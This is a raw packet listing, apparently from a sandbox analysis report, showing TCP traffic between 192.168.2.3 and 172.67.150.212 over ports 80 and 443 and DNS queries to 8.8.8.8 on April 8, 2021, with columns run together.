                                                                                    Apr 8, 2021 12:23:56.307495117 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.307511091 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.307527065 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.307553053 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.307569981 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.307590008 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.307605982 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.307626009 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.307641983 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.307650089 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.307655096 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.307737112 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.307765007 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.307784081 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.307806015 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.307820082 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.307828903 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.307841063 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.307926893 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.386554003 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.386579037 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388286114 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.388329029 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388355970 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388375044 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388392925 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388410091 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388427019 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388458014 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388478994 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388503075 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388520002 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388531923 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388547897 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388564110 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388581991 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388602972 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388618946 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388636112 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388653994 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388669968 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388691902 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388710022 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388735056 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388753891 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388766050 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388813972 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388832092 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388848066 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388865948 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388884068 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388902903 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388930082 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388947010 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388963938 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388983011 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388995886 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.388999939 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389014959 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389019966 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389027119 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389030933 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389033079 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389034986 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389036894 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389039993 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389043093 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389045954 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389048100 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389051914 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389054060 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389056921 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389059067 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389060974 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389064074 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389076948 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389079094 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389094114 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389094114 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389110088 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389111042 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389130116 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389146090 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389147997 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389168024 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389182091 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389194012 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389214039 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389223099 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389236927 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389256954 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389261007 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389273882 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389286995 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389311075 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389316082 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389331102 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389348984 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389350891 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389372110 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389401913 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389411926 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389421940 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389432907 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389448881 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389467001 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389482975 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389487028 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389508009 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389533043 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389539003 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389553070 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389556885 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389568090 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389592886 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389611006 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389624119 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389635086 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389657974 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389662027 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389668941 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389688015 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389693975 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389708042 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389730930 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389734030 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389749050 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389766932 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389785051 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389790058 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389797926 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389842033 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389863968 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389893055 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389914989 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389931917 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389941931 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389974117 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.390003920 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.390022039 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.390038967 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.390053988 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.390064955 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.390078068 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.390105009 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.390142918 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.390161037 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.390192986 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.390208960 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.390254974 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.390297890 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.390340090 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.390384912 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.390407085 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.390424967 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.390451908 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.390480995 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.390496969 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.390513897 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.390557051 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.390697956 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.390748978 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.390758991 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.390780926 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.390836000 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.390844107 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.390893936 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.390932083 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.390940905 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.391000032 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.391043901 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.391074896 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.391091108 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.391124010 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.391165018 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.391177893 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.391180038 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.391201973 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.391242027 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.391273975 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.391290903 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.391343117 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.391360998 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.391383886 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.391402960 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.391412973 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.391470909 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.391483068 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.391551018 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.391585112 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.391604900 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.391635895 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.391686916 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.391853094 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.391871929 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.391891956 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.391901016 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.391925097 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.391982079 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.472352982 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.472403049 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.472424030 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.472444057 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.472465992 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.472486019 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.472491980 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.472565889 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.472592115 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.472604036 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.472624063 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.472630978 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.472642899 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.472644091 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.472668886 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.472675085 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.472687006 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.472701073 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.472726107 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.472734928 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.472747087 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.472757101 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.472800016 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.472820997 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.472848892 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.472871065 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.472892046 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.472913027 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.472934008 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.472965002 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.472965956 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.472986937 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.473014116 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.473037004 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.473062038 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.473088980 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.473099947 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.473108053 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.473128080 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.473151922 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.473174095 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.473196030 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.473256111 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.473285913 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.473294973 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.473359108 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.473365068 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.473407030 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.473427057 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.473429918 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.473447084 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.473467112 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.473485947 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.473488092 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.473509073 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.473536015 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.473551035 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.473575115 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.473653078 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.473666906 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.473717928 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.473745108 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.473763943 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.473784924 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.473795891 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.473828077 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.473880053 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.990586042 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:24:41.087272882 CEST4970380192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:24:41.087487936 CEST49704443192.168.2.3172.67.150.212

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Apr 8, 2021 12:23:42.917279005 CEST5128153192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:23:42.929795980 CEST53512818.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:23:44.470633030 CEST4919953192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:23:44.483788967 CEST53491998.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:23:45.276004076 CEST5062053192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:23:45.289416075 CEST53506208.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.030350924 CEST6493853192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:23:50.051722050 CEST53649388.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.210664988 CEST6015253192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:23:50.224140882 CEST53601528.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.612390995 CEST5754453192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:23:50.625015020 CEST53575448.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:23:59.172339916 CEST5598453192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:23:59.184833050 CEST53559848.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:23:59.422822952 CEST6418553192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:23:59.437611103 CEST53641858.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:24:02.751158953 CEST6511053192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:02.763899088 CEST53651108.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:24:06.747265100 CEST5836153192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:06.760493040 CEST53583618.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:24:07.610752106 CEST6349253192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:07.624152899 CEST53634928.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:24:08.875972033 CEST6083153192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:08.887880087 CEST53608318.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:24:10.049112082 CEST6010053192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:10.061590910 CEST53601008.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:24:10.814594984 CEST5319553192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:10.827524900 CEST53531958.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:24:11.909168005 CEST5014153192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:11.925478935 CEST53501418.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:24:12.664707899 CEST5302353192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:12.677476883 CEST53530238.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:24:14.338356972 CEST4956353192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:14.351156950 CEST53495638.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:24:15.088790894 CEST5135253192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:15.101512909 CEST53513528.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:24:16.885636091 CEST5934953192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:16.897653103 CEST53593498.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:24:18.523852110 CEST5708453192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:18.535731077 CEST53570848.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:24:19.051294088 CEST5882353192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:19.070105076 CEST53588238.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:24:19.475449085 CEST5756853192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:19.489020109 CEST53575688.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:24:20.178817987 CEST5054053192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:20.191713095 CEST53505408.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:24:22.196455002 CEST5436653192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:22.209259033 CEST53543668.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:24:23.142556906 CEST5303453192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:23.155062914 CEST53530348.8.8.8192.168.2.3
